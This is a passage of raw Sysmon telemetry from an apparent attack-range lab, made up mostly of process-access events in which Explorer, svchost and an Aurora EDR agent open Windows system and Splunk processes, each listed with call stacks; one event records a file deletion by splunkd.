12:30:01.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200500C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+1088a6|C:\Windows\System32\TwinUI.dll+82197|C:\Windows\System32\TwinUI.dll+be23e|C:\Windows\System32\TwinUI.dll+be209|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+56fe5|C:\Windows\System32\TwinUI.dll+37508|C:\Windows\System32\TwinUI.dll+37428|C:\Windows\System32\TwinUI.dll+38873|C:\Windows\System32\TwinUI.dll+36e4d|C:\Windows\System32\TwinUI.dll+36c51|C:\Windows\System32\TwinUI.dll+3fb230|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000046484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:01.237{FE4C2B44-DDF9-63C7-C404-00000000AF02}52002688C:\Windows\Explorer.EXE{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+56fe5|C:\Windows\System32\TwinUI.dll+37570|C:\Windows\System32\TwinUI.dll+37415|C:\Windows\System32\TwinUI.dll+38873|C:\Windows\System32\TwinUI.dll+36e4d|C:\Windows\System32\TwinUI.dll+36c51|C:\Windows\System32\TwinUI.dll+3fb230|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 23542300x800000000000000018674Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:01.149{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=90EDA564224D043C5AA6CC1D4827C4F3,SHA256=55342A9E004185EFB2FE0302C9E838A67371C52A90FF84EAB980D593838764F0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018707Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.806{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018706Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.803{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018705Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.801{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018704Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.796{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018703Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.792{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018702Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.790{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018701Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.789{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018700Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.783{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018699Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.782{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018698Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.779{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018697Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.775{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018696Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.769{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018695Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.764{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018694Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.761{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018693Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.752{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018692Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.748{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018691Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.738{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018690Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.735{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018689Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.714{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018688Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.703{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018687Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.691{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018686Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.681{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018685Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.668{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018684Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.614{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018683Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.603{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000132803D0) 10341000x800000000000000018682Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:30:02.594{E5A8D418-DC44-63C7-1C00-00000000B002}20203060C:\Program 